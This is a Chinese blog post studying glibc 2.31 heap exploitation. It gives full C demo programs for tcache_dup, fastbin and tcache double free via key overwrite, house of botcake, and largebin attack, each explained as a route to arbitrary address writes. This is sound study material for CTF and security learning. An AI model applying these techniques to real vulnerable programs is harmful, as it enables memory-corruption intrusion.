学习的一下高版本的libc的利用方式。

  项目地址:https://github.com/StarCross-Tech/heap_exploit_2.31

tcache_dup

源代码:

  1.  1 #include<stdio.h>
  2.  2 #include<stdlib.h>
  3.  3 #include<inttypes.h>
  4.  4 int main(int argc,char **argv)
  5.  5 {
  6.  6     //this is tcache
  7.  7     /*
  8.  8     *typedef struct tcache_entry
  9.  9     {
  10. 10         struct tcache_entry *next;
  11. 11    //This field exists to detect double frees.
  12. 12         struct tcache_perthread_struct *key;
  13. 13     } tcache_entry;
  14. 14      */
  15. 15     setbuf(stdout, 0);
  16. 16     setbuf(stderr, 0);
  17. 17     printf("tcache_dup can help you achieve \"arbitrary address writes\"\n");
  18. 18     void *p,*q,*r,*d;
  19. 19     p = malloc(0x10);
  20. 20     q = malloc(0x10);
  21. 21     free(p);
  22. 22     printf("now , we have a tcache which is already free\n");
  23. 23     printf("We can modify its next pointer!\n");
  24. 24     *(uint64_t *)p = (uint64_t)q;
  25. 25     printf("now p's next pointer = q\n");
  26. 26     printf("p's next = %p ,q = %p\n",*(uint64_t *)p,q);
  27. 27     printf("so,We can malloc twice to get a pointer to q,sure you can change this to what you want!\n");
  28. 28     r = malloc(0x10);
  29. 29     d = malloc(0x10);
  30. 30     printf("OK!, we get we want!\n");
  31. 31 }

  u1s1,我看完之后没有任何收获。

fastbin_double_free

源代码:

  1.  1 #include<stdio.h>
  2.  2 #include<stdlib.h>
  3.  3 #include<inttypes.h>
  4.  4 int main()
  5.  5 {
  6.  6     /*this is double free related security mechanisms in glibc 2.29.
  7.  7      *    if (__builtin_expect (old == p, 0))
  8.  8       malloc_printerr ("double free or corruption (fasttop)");
  9.  9     * */
  10. 10     setbuf(stdout, 0);
  11. 11     setbuf(stderr, 0);
  12. 12     printf("fastbin_double_free can help you achieve \"arbitrary address writes\"\n");
  13. 13
  14. 14     void *q,*r,*d;
  15. 15     void *p[7];
  16. 16     printf("First of all ,we need to Apply for heap blocks of the same size to consume tcache!\n");
  17. 17     for(int i=0;i<7;i++)
  18. 18     {
  19. 19         p[i] = malloc(0x10);
  20. 20         printf("p[%d]  ===>  %p\n",i,p[i]);
  21. 21     }
  22. 22     q = malloc(0x10);
  23. 23     r = malloc(0x10);
  24. 24     printf("now , we need to free 7 heap blocks to populate tcache linked list!\n");
  25. 25     for(int i=0;i<7;i++)
  26. 26     {
  27. 27         printf("now free p[%d]  ===>  %p\n",i,p[i]);
  28. 28         free(p[i]);
  29. 29         p[i] = 0;
  30. 30     }
  31. 31     printf("now ,Our free heap blocks will be put into fastbin\n");
  32. 32     printf("now free q  ===>  %p\n",q);
  33. 33     free(q);
  34. 34     printf("in order to achieve double free , we need to free another block to bypass check in glibc 2.29 !\n");
  35. 35     printf("now free r  ===>  %p\n",r);
  36. 36     free(r);
  37. 37     printf("now we free q again!\n");
  38. 38     printf("now free q  ===>  %p\n",q);
  39. 39     free(q);
  40. 40     printf("OK,we already achieve double free in glibc 2.29.!\n");
  41. 41 }

  利用思路是,先free掉7个chunk来填充tcache,然后就和2.23的double free一样,free(a),free(b),free(a)来达到任意地址写。

tcache_double_free

源代码:

  1.  1 #include<stdio.h>
  2.  2 #include<stdlib.h>
  3.  3 #include<inttypes.h>
  4.  4 int main(int argc,char **argv)
  5.  5 {
  6.  6     //glibc 2.29 Security Mechanism
  7.  7     /*
  8.  8      *if (__glibc_unlikely (e->key == tcache))
  9.  9       {
  10. 10         tcache_entry *tmp;
  11. 11         LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
  12. 12         for (tmp = tcache->entries[tc_idx];
  13. 13          tmp;
  14. 14          tmp = tmp->next)
  15. 15           if (tmp == e)
  16. 16         malloc_printerr ("free(): double free detected in tcache 2");
  17. 17         // If we get here, it was a coincidence.  We've wasted a
  18. 18            few cycles, but don't abort.
  19. 19       }
  20. 20      */
  21. 21     setbuf(stdout, 0);
  22. 22     setbuf(stderr, 0);
  23. 23     printf("tcache_double_free can help you achieve \"arbitrary address writes\"\n");
  24. 24     void *p,*q,*r,*d;
  25. 25     p = malloc(0x10);
  26. 26     free(p);
  27. 27     printf("now we already free p = %p\n",p);
  28. 28     printf("we can change its key to help us achieve double free\n");
  29. 29     printf("its key = %p,now\n",*(uint64_t *)(p+8));
  30. 30     *(uint64_t *)(p + 8) = 0x122220;
  31. 31     printf("after we change,its key = %p\n",*(uint64_t *)(p+8));
  32. 32     printf("so we can achieve double free!");
  33. 33     free(p);
  34. 34     printf("now we already achieve double free in glibc 2.29");
  35. 35     return 0;
  36. 36 }

  在2.29及以上,chunk被free后存在tache时,为了检测是否被double free引入一个key值。再具体的东西我也不懂(菜狗不想看glibc源码)。

  这个例子的利用思路就是,free(a),然后修改a这个chunk的key值,然后就可以继续free(a)了,然后就可以实现任意写了。

house_of_botcake

源代码:

  1.  1 #include <stdio.h>
  2.  2 #include <stdlib.h>
  3.  3 #include <inttypes.h>
  4.  4
  5.  5 static uint64_t victim = 0;
  6.  6 int main()
  7.  7 {
  8.  8     setbuf(stdin, NULL);
  9.  9     setbuf(stdout, NULL);
  10. 10
  11. 11     printf("Inspired by how2heap\n");
  12. 12     printf("You can use this technique to create chunk overlap, only relies on double free.\n");
  13. 13
  14. 14     printf("\n1. Alloc 7 chunks to fill up tcache list\n");
  15. 15
  16. 16     char *x[7];
  17. 17     for(int i=0; i<7; i++){
  18. 18         x[i] = malloc(0x100);
  19. 19     }
  20. 20
  21. 21     printf("\n2. Prepare two chunk with the same size as befor, for consolidation in unsortedbin\n");
  22. 22
  23. 23     char *a = malloc(0x100);
  24. 24     char *b = malloc(0x100);
  25. 25
  26. 26     printf("Padding chunk to prevent consolidation\n");
  27. 27     malloc(0x10);
  28. 28
  29. 29     printf("\n3. Fill in the tcache list and consolidation two prepared chunk in unsortedbin\n");
  30. 30     for(int i=0; i<7; i++){
  31. 31         free(x[i]);
  32. 32     }
  33. 33
  34. 34     free(b);
  35. 35     free(a);
  36. 36
  37. 37     printf("\n4. Get a chunk from tcache list and make chunk overlap\n");
  38. 38     malloc(0x100);
  39. 39
  40. 40     free(b);
  41. 41     printf("Now, chunk %p will be freed into tcache list\n", b);
  42. 42
  43. 43     char* res = malloc(0x130);
  44. 44     printf("Size is not matched with tcache list, so get chunk from unsortedbin, which makes chunk overlap\n");
  45. 45
  46. 46     *(uint64_t*)(res+0x110) = (uint64_t)(&victim);
  47. 47
  48. 48     printf("Now, you can control tcache list to alloc arbitrary address\n");
  49. 49     malloc(0x100);
  50. 50
  51. 51     char *target = malloc(0x100);
  52. 52     printf("Before attack, victim's value: 0x%lx\n", victim);
  53. 53     *(uint64_t*)target = 0xdeadbeef;
  54. 54     printf("After attack, victim's value: 0x%lx\n", victim);
  55. 55
  56. 56     return 0;
  57. 57 }

  利用double free构造堆块重叠。

  首先将tcache填充满,然后free两个同样大小的堆块a和b,让a和b合并。将tcache中的一个chunk申请出来,然后再次free掉b堆块,此时b堆块既在unsortedbin中,又在tcache链中。

  修改b堆块的fd指针为victim_addr,申请两次chunk,第二次就申请到victim_addr了。

largebin_attack

源代码:

  1.  1 #include <stdio.h>
  2.  2 #include <stdlib.h>
  3.  3 #include <inttypes.h>
  4.  4
  5.  5 static uint64_t victim;
  6.  6
  7.  7 int main()
  8.  8 {
  9.  9     setbuf(stdout, 0);
  10. 10     setbuf(stderr, 0);
  11. 11
  12. 12     printf("You can use this technique to write a big number to arbitrary address\n");
  13. 13     char *p1, *p2, *p3;
  14. 14     printf("\n1. Create two chunk, and free the larger one into largebin list\n");
  15. 15
  16. 16     p1 = malloc(0x458);
  17. 17     malloc(0x18);
  18. 18     p2 = malloc(0x448);
  19. 19     malloc(0x18);
  20. 20
  21. 21     free(p1);
  22. 22     //trigger
  23. 23     malloc(0x600);
  24. 24
  25. 25     printf("Now the chunk %p is in largebin\n", p1);
  26. 26
  27. 27     printf("\n2. Free the smaller one into unsortedbin, and change chunk's bk_nextsize in largebin to &victim-0x20\n");
  28. 28     free(p2);
  29. 29     printf("Now the chunk %p is in unsortedbin\n", p2);
  30. 30
  31. 31     *(uint64_t*)(p1+0x18) = (uint64_t)(&victim)-0x20;
  32. 32
  33. 33     printf("\n3. Alloc a size not match the the chunk size in unsortedbin\n");
  34. 34     printf("It will trigger largebin attack, write a big number to victim\n");
  35. 35     printf("Before attack, victim's value: 0x%lx\n", victim);
  36. 36     malloc(0x68);
  37. 37     printf("After attack, victim's value: 0x%lx\n", victim);
  38. 38
  39. 39     return 0;
  40. 40 }

  创建两个大于0x400的chunk(a)和chunk(b),先将chunk(a)释放掉,让chunk(a)先落入unsortedbin中,再创建size比这个chunk(a)大的堆块,此时的chunk(a)就会进入largebins。

  将chunk(b)释放掉,将chunk(a)的bk_nextsize修改为victim-0x20,此时chunk(b)在unsortedbin中,申请一个比chunk(b)小的chunk,就会触发largebin attack,在victim处留下一个较大的数。

heap exploit about ptmalloc in glibc version 2.31的更多相关文章

  1. OD: Heap Exploit : DWORD Shooting & Opcode Injecting

    堆块分配时的任意地址写入攻击原理 堆管理系统的三类操作:分配.释放.合并,归根到底都是对堆块链表的修改.如果能伪造链表结点的指针,那么在链表装卸的过程中就有可能获得读写内存的机会.堆溢出利用的精髓就是 ...

  2. linux系统编程:获取glibc的版本号

    我的环境是ubuntu16.04 glibc官网:http://www.gnu.org/software/libc/libc.html 方法一.一般来说,涉及到库调用的程序,在链接时候都会链接到gli ...

  3. 检测Linux glibc幽灵漏洞和修补漏洞

    1.首先安装rpm : sudo apt-get install rpm   wget -OGHOST-test.sh http://www.antian365.com/lab/linux0day/G ...

  4. Linux Glibc幽灵漏洞紧急修补方案【转】

    转自:http://blog.csdn.net/chen19870707/article/details/43560823 幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者 ...

  5. tcmalloc jemalloc 和ptmalloc 对比

    ptmalloc 是glibc的内存分配管理 tcmalloc 是google的内存分配管理模块 jemalloc 是BSD的提供的内存分配管理 三者的性能对比参考从网上的一个图如下: 自己测试了一下 ...

  6. 极客时间-左耳听风-程序员攻略-Linux系统、内存和网络

    程序员练级攻略:Linux系统.内存和网络 Linux 系统相关 Red Hat Enterprise Linux 文档 . Linux Insides ,GitHub 上的一个开源电子书,其中讲述了 ...

  7. 安装 jemalloc for mysql

    参考: MySQL bug:https://bugs.mysql.com/bug.php?id=83047&tdsourcetag=s_pcqq_aiomsg https://github.c ...

  8. 2.Linux文件IO编程

    2.1Linux文件IO概述 2.1.0POSIX规范 POSIX:(Portable Operating System Interface)可移植操作系统接口规范. 由IEEE制定,是为了提高UNI ...

  9. gdb常用命令(转)

    pwn常常会用到gdb,看到一篇不错的文章,记录了很多命令:https://www.jianshu.com/p/c3e5f5972b21 gdb 基础调试命令 s step,si步入 n 执行下一条指 ...

随机推荐

  1. [hdu7034]Array

    令$f(a)_{i}=\min_{i<j\le n,a_{i}=a_{j}}j$​​(特别的,若不存在$j$​​则令$f(a)_{i}=n+1$​​),则有以下性质: 1.对于$b_{i}$​​ ...

  2. [hdu6578]Blank

    状态f[i][j][k][l]表示前i个数,四种数的最后一次出现的位置分别是i.j.k和l(i>j>k>l),判断所有第右端点为i的区间是否满足此要求(不满足重置为0),考虑第i+1 ...

  3. 五、Zookeeper的Shell操作

    前文 一.CentOS7 hadoop3.3.1安装(单机分布式.伪分布式.分布式 二.JAVA API实现HDFS 三.MapReduce编程实例 四.Zookeeper3.7安装 Zookeepe ...

  4. 详解Python Streamlit框架,用于构建精美数据可视化web app,练习做个垃圾分类app

    今天详解一个 Python 库 Streamlit,它可以为机器学习和数据分析构建 web app.它的优势是入门容易.纯 Python 编码.开发效率高.UI精美. 上图是用 Streamlit 构 ...

  5. Linux——防火墙、SELinux规则

    一.Firewalld防火墙规则 防火墙的作用:放行或者阻拦某些服务.端口 1.防火墙的简单操作 # 1.查看防火墙状态 systemctl status firewalld # 2.关闭防火墙 sy ...

  6. JavaScript Sanitizer API:原生WEB安全API出现啦

    10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案.这份草案用来解决浏览器如 ...

  7. 洛谷 P3287 - [SCOI2014]方伯伯的玉米田(BIT 优化 DP)

    洛谷题面传送门 怎么题解区全是 2log 的做法/jk,这里提供一种 1log 并且代码更短(bushi)的做法. 首先考虑对于一个序列 \(a\) 怎样计算将其变成单调不降的最小代价.对于这类涉及区 ...

  8. C/C++ Qt TabWidget 实现多窗体创建

    在开发窗体应用时通常会伴随分页,ToolBar组件可以实现顶部工具栏菜单,每一个ToolBar组件关联到一个TabWidget组件的Tab标签内,这样我们就可以实现一个复杂的多窗体分页结构,此类结构也 ...

  9. .NET6控制台程序使用quartz.net

    1.新建一个名为"ConsoleQuartz"的.NET6控制台程序. 2.nuget中安装Quartz和Quartz.Plugins,这2个DLL. 3.新建一个HelloQua ...

  10. 【豆科基因组】大豆(Soybean, Glycine max)经典文章梳理2010-2020

    目录 2010年1月:大豆基因组首次发表(Nature) 2010年12月:31个大豆基因组重测序(Nature Genetics) 2014年10月:野生大豆泛基因组(Nature Biotechn ...